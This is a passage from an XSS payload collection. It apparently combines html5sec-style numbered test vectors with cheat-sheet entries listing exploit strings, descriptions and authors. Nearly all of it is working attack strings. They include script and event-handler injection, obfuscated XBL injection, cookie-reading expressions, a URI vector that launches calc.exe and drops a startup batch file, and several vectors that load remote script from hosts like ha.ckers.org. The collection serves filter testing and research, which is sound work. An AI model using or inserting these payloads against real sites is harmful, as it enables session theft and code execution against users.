src=test.vml#xss></vmlframe>//["'`-->]]>]</div><div id="35">1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:alert(35) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>//["'`-->]]>]</div><div id="36"><a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(36)">XXX</a>//["'`-->]]>]</div><div id="37"><!--<img src="--><img src=x onerror=alert(37)//">//["'`-->]]>]</div><div id="38"><comment><img src="</comment><img src=x onerror=alert(38)//">//["'`-->]]>]</div> <div id="39"><!-- up to Opera 11.52, FF 3.6.28 --> <![><img src="]><img src=x onerror=alert(39)//"> <!-- IE9+, FF4+, Opera 11.60+, Safari 4.0.4+, GC7+ --> <svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(2)//"></svg>//["'`-->]]>]</div> <div id="40"><style><img src="</style><img src=x onerror=alert(40)//">//["'`-->]]>]</div> <div id="41"><li style=list-style:url() onerror=alert(41)></li> <div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(41)></div>//["'`-->]]>]</div> <div id="42"><head><base href="javascript://"/></head><body><a href="/. /,alert(42)//#">XXX</a></body>//["'`-->]]>]</div> <div id="43"><?xml version="1.0" standalone="no"?> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <style type="text/css"> @font-face {font-family: y; src: url("font.svg#x") format("svg");} body {font: 100px "y";} </style> </head> <body>Hello</body> </html>//["'`-->]]>]</div> <div id="44"><style>*[{}@import'test.css?]{color: green;}</style>X//["'`-->]]>]</div><div id="45"><div style="font-family:'foo[a];color:red;';">XXX</div>//["'`-->]]>]</div><div id="46"><div style="font-family:foo}color=red;">XXX</div>//["'`-->]]>]</div><div id="47"><svg xmlns="http://www.w3.org/2000/svg"><script>alert(47)</script></svg>//["'`-->]]>]</div><div id="48"><SCRIPT FOR=document EVENT=onreadystatechange>alert(48)</SCRIPT>//["'`-->]]>]</div><div id="49"><OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(49)"></OBJECT>//["'`-->]]>]</div><div id="50"><object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>//["'`-->]]>]</div><div id="51"><embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></embed>//["'`-->]]>]</div><div id="52"><x style="behavior:url(test.sct)">//["'`-->]]>]</div> <div id="53"><xml id="xss" src="test.htc"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label>//["'`-->]]>]</div> <div id="54"><script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script>//["'`-->]]>]</div><div id="55"><video><source onerror="alert(55)">//["'`-->]]>]</div><div id="56"><video onerror="alert(56)"><source></source></video>//["'`-->]]>]</div><div id="57"><b <script>alert(57)//</script>0</script></b>//["'`-->]]>]</div><div id="58"><b><script<b></b><alert(58)</script </b></b>//["'`-->]]>]</div><div id="59"><div id="div1"><input value="``onmouseover=alert(59)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>//["'`-->]]>]</div><div id="60"><div style="[a]color[b]:[c]red">XXX</div>//["'`-->]]>]</div> <div id="61"><div style="\63&#9\06f&#10\0006c&#12\00006F&#13\R:\000072 Ed;color\0\bla:yellow\0\bla;col\0\00 \&#xA0or:blue;">XXX</div>//["'`-->]]>]</div> <div id="62"><!-- IE 6-8 --> <x '="foo"><x foo='><img src=x onerror=alert(62)//'> <!-- IE 6-9 --> <! '="foo"><x foo='><img src=x onerror=alert(2)//'> <? '="foo"><x foo='><img src=x onerror=alert(3)//'>//["'`-->]]>]</div> <div id="63"><embed src="javascript:alert(63)"></embed> // O10.10↓, OM10.0↓, GC6↓, FF <img src="javascript:alert(2)"> <image src="javascript:alert(2)"> // IE6, O10.10↓, OM10.0↓ <script src="javascript:alert(3)"></script> // IE6, O11.01↓, OM10.1↓//["'`-->]]>]</div> <div id="64"><!DOCTYPE x[<!ENTITY x SYSTEM "http://html5sec.org/test.xxe">]><y>&x;</y>//["'`-->]]>]</div><div id="65"><svg onload="javascript:alert(65)" xmlns="http://www.w3.org/2000/svg"></svg>//["'`-->]]>]</div> <div id="66"><?xml version="1.0"?> <?xml-stylesheet type="text/xsl" href="data:,%3Cxsl:transform version='1.0' xmlns:xsl='http://www.w3.org/1999/XSL/Transform' id='xss'%3E%3Cxsl:output method='html'/%3E%3Cxsl:template match='/'%3E%3Cscript%3Ealert(66)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E"?> <root/>//["'`-->]]>]</div> <div id="67"><!DOCTYPE x [ <!ATTLIST img xmlns CDATA "http://www.w3.org/1999/xhtml" src CDATA "xx:x" onerror CDATA "alert(67)" onload CDATA "alert(2)"> ]><img />//["'`-->]]>]</div> <div id="68"><doc xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:html="http://www.w3.org/1999/xhtml"> <html:style /><x xlink:href="javascript:alert(68)" xlink:type="simple">XXX</x> </doc>//["'`-->]]>]</div> <div id="69"><card xmlns="http://www.wapforum.org/2001/wml"><onevent type="ontimer"><go href="javascript:alert(69)"/></onevent><timer value="1"/></card>//["'`-->]]>]</div><div id="70"><div style=width:1px;filter:glow onfilterchange=alert(70)>x</div>//["'`-->]]>]</div><div id="71"><// style=x:expression\28alert(71)\29>//["'`-->]]>]</div><div id="72"><form><button formaction="javascript:alert(72)">X</button>//["'`-->]]>]</div><div id="73"><event-source src="event.php" onload="alert(73)">//["'`-->]]>]</div><div id="74"><a href="javascript:alert(74)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A" /></a>//["'`-->]]>]</div><div id="75"><script<{alert(75)}/></script </>//["'`-->]]>]</div><div id="76"><?xml-stylesheet type="text/css"?><!DOCTYPE x SYSTEM "test.dtd"><x>&x;</x>//["'`-->]]>]</div><div id="77"><?xml-stylesheet type="text/css"?><root style="x:expression(alert(77))"/>//["'`-->]]>]</div><div id="78"><?xml-stylesheet type="text/xsl" href="#"?><img xmlns="x-schema:test.xdr"/>//["'`-->]]>]</div><div id="79"><object allowscriptaccess="always" data="test.swf"></object>//["'`-->]]>]</div><div id="80"><style>*{x:expression(alert(80))}</style>//["'`-->]]>]</div><div id="81"><x xmlns:xlink="http://www.w3.org/1999/xlink" xlink:actuate="onLoad" xlink:href="javascript:alert(81)" xlink:type="simple"/>//["'`-->]]>]</div><div id="82"><?xml-stylesheet type="text/css" href="data:,*%7bx:expression(write(2));%7d"?>//["'`-->]]>]</div> <div id="83"><x:template xmlns:x="http://www.wapforum.org/2001/wml" x:ontimer="$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(83)"><x:timer value="1"/></x:template>//["'`-->]]>]</div> <div id="84"><x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="javascript:alert(84)//#x"/>//["'`-->]]>]</div><div id="85"><x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="test.evt#x"/>//["'`-->]]>]</div><div id="86"><body oninput=alert(86)><input autofocus>//["'`-->]]>]</div> <div id="87"><svg xmlns="http://www.w3.org/2000/svg"> <a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert(87)"><rect width="1000" height="1000" fill="white"/></a> </svg>//["'`-->]]>]</div> <div id="88"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <animation xlink:href="javascript:alert(88)"/> <animation xlink:href="data:text/xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(88)'%3E%3C/svg%3E"/> <image xlink:href="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(88)'%3E%3C/svg%3E"/> <foreignObject xlink:href="javascript:alert(88)"/> <foreignObject xlink:href="data:text/xml,%3Cscript xmlns='http://www.w3.org/1999/xhtml'%3Ealert(88)%3C/script%3E"/> </svg>//["'`-->]]>]</div> <div id="89"><svg xmlns="http://www.w3.org/2000/svg"> <set attributeName="onmouseover" to="alert(89)"/> <animate attributeName="onunload" to="alert(89)"/> </svg>//["'`-->]]>]</div> <div id="90"><!-- Up to Opera 10.63 --> <div style=content:url(test2.svg)></div> <!-- Up to Opera 11.64 - see link below --> <!-- Up to Opera 12.x --> <div style="background:url(test5.svg)">PRESS ENTER</div>//["'`-->]]>]</div> <div id="91">[A] <? foo="><script>alert(91)</script>"> <! foo="><script>alert(91)</script>"> </ foo="><script>alert(91)</script>"> [B] <? foo="><x foo='?><script>alert(91)</script>'>"> [C] <! foo="[[[x]]"><x foo="]foo><script>alert(91)</script>"> [D] <% foo><x foo="%><script>alert(91)</script>">//["'`-->]]>]</div> <div id="92"><div style="background:url(http://foo.f/f oo/;color:red/*/foo.jpg);">X</div>//["'`-->]]>]</div><div id="93"><div style="list-style:url(http://foo.f)\20url(javascript:alert(93));">X</div>//["'`-->]]>]</div> <div id="94"><svg xmlns="http://www.w3.org/2000/svg"> <handler xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load">alert(94)</handler> </svg>//["'`-->]]>]</div> <div id="95"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <feImage> <set attributeName="xlink:href" to="data:image/svg+xml;charset=utf-8;base64, PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D%3D"/> </feImage> </svg>//["'`-->]]>]</div> <div id="96"><iframe src=mhtml:http://html5sec.org/test.html!xss.html></iframe> <iframe src=mhtml:http://html5sec.org/test.gif!xss.html></iframe>//["'`-->]]>]</div> <div id="97"><!-- IE 5-9 --> <div id=d><x xmlns="><iframe onload=alert(97)"></div> <script>d.innerHTML+='';</script> <!-- IE 10 in IE5-9 Standards mode --> <div id=d><x xmlns='"><iframe onload=alert(2)//'></div> <script>d.innerHTML+='';</script>//["'`-->]]>]</div> <div id="98"><div id=d><div style="font-family:'sans\27\2F\2A\22\2A\2F\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script>//["'`-->]]>]</div> <div id="99">XXX<style> *{color:gre/**/en !/**/important} /* IE 6-9 Standards mode */ <!-- --><!--*{color:red} /* all UA */ *{background:url(xx:x //**/\red/*)} /* IE 6-7 Standards mode */ </style>//["'`-->]]>]</div> <div id="100"><img[a][b]src=x[d]onerror[c]=[e]"alert(100)">//["'`-->]]>]</div><div id="101"><a href="[a]java[b]script[c]:alert(101)">XXX</a>//["'`-->]]>]</div><div id="102"><img src="x` `<script>alert(102)</script>"` `>//["'`-->]]>]</div><div id="103"><script>history.pushState(0,0,'/i/am/somewhere_else');</script>//["'`-->]]>]</div> <div id="104"><svg xmlns="http://www.w3.org/2000/svg" id="foo"> <x xmlns="http://www.w3.org/2001/xml-events" event="load" observer="foo" handler="data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Chandler%20xml%3Aid%3D%22bar%22%20type%3D%22application%2Fecmascript%22%3E alert(104) %3C%2Fhandler%3E%0A%3C%2Fsvg%3E%0A#bar"/> </svg>//["'`-->]]>]</div> <div id="105"><iframe src="data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03"></iframe>//["'`-->]]>]</div><div id="106"><img src onerror /" '"= alt=alert(106)//">//["'`-->]]>]</div><div id="107"><title onpropertychange=alert(107)></title><title title=></title>//["'`-->]]>]</div> <div id="108"><!-- IE 5-8 standards mode --> <a href=http://foo.bar/#x=`y></a><img alt="`><img src=xx:x onerror=alert(108)></a>"> <!-- IE 5-9 standards mode --> <!a foo=x=`y><img alt="`><img src=xx:x onerror=alert(2)//"> <?a foo=x=`y><img alt="`><img src=xx:x onerror=alert(3)//">//["'`-->]]>]</div> <div id="109"><svg xmlns="http://www.w3.org/2000/svg"> <a id="x"><rect fill="white" width="1000" height="1000"/></a> <rect fill="white" style="clip-path:url(test3.svg#a);fill:url(#b);filter:url(#c);marker:url(#d);mask:url(#e);stroke:url(#f);"/> </svg>//["'`-->]]>]</div> <div id="110"><svg xmlns="http://www.w3.org/2000/svg"> <path d="M0,0" style="marker-start:url(test4.svg#a)"/> </svg>//["'`-->]]>]</div> <div id="111"><div style="background:url(/f#[a]oo/;color:red/*/foo.jpg);">X</div>//["'`-->]]>]</div><div id="112"><div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X</div>//["'`-->]]>]</div> <div id="113"><div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style>//["'`-->]]>]</div> <div id="114"><x style="background:url('x[a];color:red;/*')">XXX</x>//["'`-->]]>]</div> <div id="115"><!--[if]><script>alert(115)</script --> <!--[if<img src=x onerror=alert(2)//]> -->//["'`-->]]>]</div> <div id="116"><div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=alert(116)&gt;">//["'`-->]]>]</div> <div id="117"><a href="http://attacker.org"> <iframe src="http://example.org/"></iframe> </a>//["'`-->]]>]</div> <div id="118"><div draggable="true" ondragstart="event.dataTransfer.setData('text/plain','malicious code');"> <h1>Drop me</h1> </div> <iframe src="http://www.example.org/dropHere.html"></iframe>//["'`-->]]>]</div> <div id="119"><iframe src="view-source:http://www.example.org/" frameborder="0" style="width:400px;height:180px"></iframe> <textarea type="text" cols="50" rows="10"></textarea>//["'`-->]]>]</div> <div id="120"><script> function makePopups(){ for (i=1;i<6;i++) { window.open('popup.html','spam'+i,'width=50,height=50'); } } </script> <body> <a href="#" onclick="makePopups()">Spam</a>//["'`-->]]>]</div> <div id="121"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:svg="http://www.w3.org/2000/svg"> <body style="background:gray"> <iframe src="http://example.com/" style="width:800px; height:350px; border:none; mask: url(#maskForClickjacking);"/> <svg:svg> <svg:mask id="maskForClickjacking" maskUnits="objectBoundingBox" maskContentUnits="objectBoundingBox"> <svg:rect x="0.0" y="0.0" width="0.373" height="0.3" fill="white"/> <svg:circle cx="0.45" cy="0.7" r="0.075" fill="white"/> </svg:mask> </svg:svg> </body> </html>//["'`-->]]>]</div> <div id="122"><iframe sandbox="allow-same-origin allow-forms allow-scripts" src="http://example.org/"></iframe>//["'`-->]]>]</div> <div id="123"><span class=foo>Some text</span> <a class=bar href="http://www.example.org">www.example.org</a> <script src="http://code.jquery.com/jquery-1.4.4.js"></script> <script> $("span.foo").click(function() { alert('foo'); $("a.bar").click(); }); $("a.bar").click(function() { alert('bar'); location="http://html5sec.org"; }); </script>//["'`-->]]>]</div> <div id="124"><script src="/\example.com\foo.js"></script> // Safari 5.0, Chrome 9, 10 <script src="\\example.com\foo.js"></script> // Safari 5.0//["'`-->]]>]</div> <div id="125"><?xml version="1.0"?> <?xml-stylesheet type="text/xml" href="#stylesheet"?> <!DOCTYPE doc [ <!ATTLIST xsl:stylesheet id ID #REQUIRED>]> <svg xmlns="http://www.w3.org/2000/svg"> <xsl:stylesheet id="stylesheet" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"> <iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:alert(125)"></iframe> </xsl:template> </xsl:stylesheet> <circle fill="red" r="40"></circle> </svg>//["'`-->]]>]</div> <div id="126"><object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="alert(126)" style="behavior:url(#x);"><param name=postdomevents /></object>//["'`-->]]>]</div> <div id="127"><svg xmlns="http://www.w3.org/2000/svg" id="x"> <listener event="load" handler="#y" xmlns="http://www.w3.org/2001/xml-events" observer="x"/> <handler id="y">alert(127)</handler> </svg>//["'`-->]]>]</div> <div id="128"><svg><style>&lt;img/src=x onerror=alert(128)// </b>//["'`-->]]>]</div> <div id="129"><svg> <image style='filter:url("data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22><script>parent.alert(129)</script></svg>")'> <!-- Same effect with <image filter='...'> --> </svg>//["'`-->]]>]</div> <div id="130"><math href="javascript:alert(130)">CLICKME</math> <math> <!-- up to FF 13 --> <maction actiontype="statusline#http://google.com" xlink:href="javascript:alert(2)">CLICKME</maction> <!-- FF 14+ --> <maction actiontype="statusline" xlink:href="javascript:alert(3)">CLICKME<mtext>http://http://google.com</mtext></maction> </math>//["'`-->]]>]</div> <div id="131"><b>drag and drop one of the following strings to the drop box:</b> <br/><hr/> jAvascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);// <br/><hr/> feed:javascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);// <br/><hr/> feed:data:text/html,&#x3c;script>alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie)&#x3c;/script>&#x3c;b> <br/><hr/> feed:feed:javAscript:javAscript:feed:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);// <br/><hr/> <div id="dropbox" style="height: 360px;width: 500px;border: 5px solid #000;position: relative;" ondragover="event.preventDefault()">+ Drop Box +</div>//["'`-->]]>]</div> <div id="132"><!doctype html> <form> <label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label> <br> <input name="secret" type="password"> </form> <!-- injection --><svg height="50px"> <image xmlns:xlink="http://www.w3.org/1999/xlink"> <set attributeName="xlink:href" begin="accessKey(a)" to="//example.com/?a" /> <set attributeName="xlink:href" begin="accessKey(b)" to="//example.com/?b" /> <set attributeName="xlink:href" begin="accessKey(c)" to="//example.com/?c" /> <set attributeName="xlink:href" begin="accessKey(d)" to="//example.com/?d" /> </image> </svg>//["'`-->]]>]</div> <div id="133"><!-- `<img/src=xx:xx onerror=alert(133)//--!>//["'`-->]]>]</div> <div id="134"><xmp> <% </xmp> <img alt='%></xmp><img src=xx:x onerror=alert(134)//'> <script> x='<%' </script> %>/ alert(2) </script> XXX <style> *['<!--']{} </style> -->{} *{color:red}</style>//["'`-->]]>]</div> <div id="135"><?xml-stylesheet type="text/xsl" href="#" ?> <stylesheet xmlns="http://www.w3.org/TR/WD-xsl"> <template match="/"> <eval>new ActiveXObject(&apos;htmlfile&apos;).parentWindow.alert(135)</eval> <if expr="new ActiveXObject('htmlfile').parentWindow.alert(2)"></if> </template> </stylesheet>//["'`-->]]>]</div> <div id="136"><form action="" method="post"> <input name="username" value="admin" /> <input name="password" type="password" value="secret" /> <input name="injected" value="injected" dirname="password" /> <input type="submit"> </form>//["'`-->]]>]</div> <div id="137"><svg> <a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="?"> <circle r="400"></circle> <animate attributeName="xlink:href" begin="0" from="javascript:alert(137)" to="&" /> </a>//["'`-->]]>]</div> <div id="138"><link rel="import" href="test.svg" />//["'`-->]]>]</div><div id="139"><iframe srcdoc="&lt;img src&equals;x:x onerror&equals;alert&lpar;1&rpar;&gt;" />//["'`-->]]>]</div>undefined  A very short cross browser header injection Exploit Name: A very short cross browser header injection Exploit String: with(document)getElementsByTagName('head')[0].appendChild(createElement('script')).src='//ŋ.ws' Exploit Description: This vector shows one of the shortest possible ways to inject external JavaScript into a website's header area. Exploit Tags: xss, short, header, injection Author Name: .mario Add onclick event hadler Exploit Name: Add onclick event hadler Exploit String: onclick=eval/**/(/ale/.source%2b/rt/.source%2b/(7)/.source); Exploit Description: This vector adds an onclick event handler to a tag and appends an obfuscated JS alert. Exploit Tags: general, JS breaking, basic, obfuscated, user interaction Author Name: kishor Advanced HTML injection locator Exploit Name: Advanced HTML injection locator Exploit String: <s>000<s>%3cs%3e111%3c/s%3e%3c%73%3e%32%32%32%3c%2f%73%3e&#60&#115&#62&#51&#51&#51&#60&#47&#115&#62&#x3c&#x73&#x3e&#x34&#x34&#x34&#x3c&#x2f&#x73&#x3e Exploit Description: This vector indicates HTML injections by stroked text. Exploit Tags: general, html breaking, injection Author Name: .mario Advanced XSS Locator Exploit Name: Advanced XSS Locator Exploit String: ';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//--></SCRIPT>">'><SCRIPT>alert(4)</SCRIPT>=&{}");}alert(6);function xss(){// Exploit Description: Advanced XSS Locator Exploit Tags: general, html breaking, comment breaking, JS breaking Author Name: .mario Advanced XSS Locator for title-Injections Exploit Name: Advanced XSS Locator for title-Injections Exploit String: ';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//--></SCRIPT>">'></title><SCRIPT>alert(4)</SCRIPT>=&{</title><script>alert(5)</script>}");} Exploit Description: This is a modified version of the XSS Locator from ha.ckers.org especially crafted to check for title injections. Exploit Tags: general, html breaking, comment breaking, JS breaking, title breaking Author Name: .mario aim: uri exploit Exploit Name: aim: uri exploit Exploit String: aim: &c:\windows\system32\calc.exe" ini="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pwnd.bat" Exploit Description: This aim-uri executes the calc.exe on vulnerable systems Exploit Tags: URI exploits, gecko, injection, general Author Name: xs-sniper Backslash-obfuscated XBL injection - variant 1 Exploit Name: Backslash-obfuscated XBL injection - variant 1 Exploit String: <div/style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)> Exploit Description: This vector utilizes backslashes to exploit a parsing error in gecko based browsers and injects a remote XBL. Exploit Tags: general, injection, gecko, style injection, XBL, obfuscated Author Name: thespanner.co.uk Backslash-obfuscated XBL injection - variant 2 Exploit Name: Backslash-obfuscated XBL injection - variant 2 Exploit String: <div/style=&#92&#45&#92&#109&#111&#92&#122&#92&#45& #98&#92&#105&#92&#110&#100&#92&#105&#110&#92&#103:& #92&#117&#114&#108&#40&#47&#47&#98&#117&#115&#105& #110&#101&#115&#115&#92&#105&#92&#110&#102&#111&#46& #99&#111&#46&#117&#107&#92&#47&#108&#97&#98&#115 &#92&#47&#120&#98&#108&#92&#47&#120&#98&#108&#92 &#46&#120&#109&#108&#92&#35&#120&#115&#115&#41&> Exploit Description: This vector utilizes backslashes to exploit a parsing error in gecko based browsers and injects a remote XBL. All important characters are obfuscated by unclosed entities. Exploit Tags: general, injection, gecko, style injection, XBL, obfuscated Author Name: thespanner.co.uk Backslash-obfuscated XBL injection - variant 3 Exploit Name: Backslash-obfuscated XBL injection - variant 3 Exploit String: <Q%^&*(£@!’」 style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)> Exploit Description: This vector utilizes backslashes to exploit a parsing error in gecko based browsers and injects a remote XBL. As we can see gecko based browsers accept various characters as valid tags. Exploit Tags: general, injection, gecko, style injection, XBL, obfuscated Author Name: thespanner.co.uk Backslash-obfuscated XBL injection - variant 4 Exploit Name: Backslash-obfuscated XBL injection - variant 4 Exploit String: <div&nbsp &nbsp style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)> Exploit Description: This vector utilizes backslashes to exploit a parsing error in gecko based browsers and injects a remote XBL. Furthermore unclosed NBSP entities are used to obfuscate the string. Exploit Tags: general, injection, gecko, style injection, XBL, obfuscated Author Name: thespanner.co.uk Backslash-obfuscated XBL injection - variant 5 Exploit Name: Backslash-obfuscated XBL injection - variant 5 Exploit String: <x/style=-m\0o\0z\0-b\0i\0nd\0i\0n\0g\0:\0u\0r\0l\0(\0/\0/b\0u\0s\0i\0ne\0s\0s\0i\0nf\0o\0.c\0o\0.\0u\0k\0/\0la\0b\0s\0/\0x\0b\0l\0/\0x\0b\0l\0.\0x\0m\0l\0#\0x\0s\0s\0)> Exploit Description: This vector utilizes backslashes to exploit a parsing error in gecko based browsers and injects a remote XBL. Between any character of the original payload null bytes are used to obfuscate. Exploit Tags: general, injection, gecko, style injection, XBL, obfuscated Author Name: thespanner.co.uk BASE Exploit Name: BASE Exploit String: <BASE HREF="javascript:alert('XSS');//"> Exploit Description: Works in IE and Netscape 8.1 in safe mode. You need the // to comment out the next characters so you won't get a JavaScript error and your XSS tag will render. Also, this relies on the fact that the website uses dynamically placed images like 」images/image.jpg」 rather than full paths. If the path includes a leading forward slash like 」/images/image.jpg」 you can remove one slash from this vector (as long as there are two to begin the comment this will work Exploit Tags: general, evil tags Author Name: ha.ckers.org Basic back ticked attribute breaker Exploit Name: Basic back ticked attribute breaker Exploit String: `> <script>alert(5)</script> Exploit Description: This vector breaks back ticked attributes. Exploit Tags: general, html breaking, basic Author Name: kishor Basic double quoted attribute breaker Exploit Name: Basic double quoted attribute breaker Exploit String: > <script>alert(4)</script> Exploit Description: This vector breaks double quoted attributes and produces an alert. Exploit Tags: general, html breaking Author Name: kishor Basic JS breaker Exploit Name: Basic JS breaker Exploit String: xyz onerror=alert(6);  Exploit String: 1;a=eval;b=alert;a(b(/c/.source));  Exploit String: 1];a=eval;b=alert;a(b(17));//  Exploit String: ];a=eval;b=alert;a(b(16));//  Exploit String: '];a=eval;b=alert;a(b(15));//  Exploit String: 1};a=eval;b=alert;a(b(14));//
 Exploit String: '};a=eval;b=alert;a(b(13));//  Exploit String: };a=eval;b=alert;a(b(12));//  Exploit String: a=1;a=eval;b=alert;a(b(11));// Exploit String: ;//%0da=eval;b=alert;a(b(10));//  Exploit String: ';//%0da=eval;b=alert;a(b(9));//  Exploit String: '> <script>alert(3)</script>  Exploit String: </title><script>alert(1)</script> Exploit String: <BGSOUND SRC="javascript:alert('XSS');"> Exploit String: <BODY BACKGROUND="javascript:alert('XSS');"> Exploit String: <BODY ONLOAD=alert('XSS')> Exploit String: <!-- <A href=" - --><a href=javascript:alert:document.domain >test--> Exploit String: <IMG SRC=JaVaScRiPt:alert('XSS')> Exploit String: <%3C&lt&lt;&LT&LT;&#60&#060&#0060&#00060&#000060&#0000060&#60;&#060;&#0060;&#00060;&#000060;&#0000060;&#x3c&#x03c&#x003c&#x0003c&#x00003c&#x000003c&#x3c;&#x03c;&#x003c;&#x0003c;&#x00003c;&#x000003c;&#X3c&#X03c&#X003c&#X0003c&#X00003c&#X000003c&#X3c;&#X03c;&#X003c;&#X0003c;&#X00003c;&#X000003c;&#x3C&#x03C&#x003C&#x0003C&#x00003C&#x000003C&#x3C;&#x03C;&#x003C;&#x0003C;&#x00003C;&#x000003C;&#X3C&#X03C&#X003C&#X0003C&#X00003C&#X000003C&#X3C;&#X03C;&#X003C;&#X0003C;&#X00003C;&#X000003C;\x3c\x3C\u003c\u003C  Exploit String: <script> var a = "</script> <script> alert('XSS !'); </script> <script>"; </script> Exploit String: <!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]--> Exploit String: */a=eval;b=alert;a(b(/e/.source));/* Exploit String: width: expression((window.r==document.cookie)?'':alert(r=document.cookie)) Exploit String: <A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A>
 Exploit String: <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> Exploit String: <DIV STYLE="background-image: url(javascript:alert('XSS'))">
 Exploit String: <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"> Exploit String: <DIV STYLE="width: expression(alert('XSS'));"> Exploit String: <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> 
<IFRAME SRC=http://ha.ckers.org/scriptlet.html < 
<A HREF="http://1113982867/">XSS</A> 
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED> 
<IMG SRC="jav&#x0D;ascript:alert('XSS');"> 
<IMG SRC="jav&#x09;ascript:alert('XSS');"> 
<IMG SRC="jav&#x0A;ascript:alert('XSS');"> 
<IMG SRC="javascript:alert('XSS');"> 
</TITLE><SCRIPT>alert("XSS");</SCRIPT> 
\";alert('XSS');// 
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> 
<SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT> 
<SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> 
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> 
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> 
eval(name) 
<A HREF="http://www.google.com./">XSS</A> 
<<SCRIPT>alert("XSS");//<</SCRIPT> 
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> 
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> 
<A HREF="//google">XSS</A> 
<A HREF="http://ha.ckers.org@google">XSS</A> 
<A HREF="http://google:ha.ckers.org">XSS</A> 
firefoxurl:test|"%20-new-window%20javascript:alert(\'Cross%2520Browser%2520Scripting!\');" 
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> 
<IMG SRC=`javascript:alert("RSnake says### 'XSS'")`> 
<IMG SRC="javascript:alert('XSS')" 
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> 
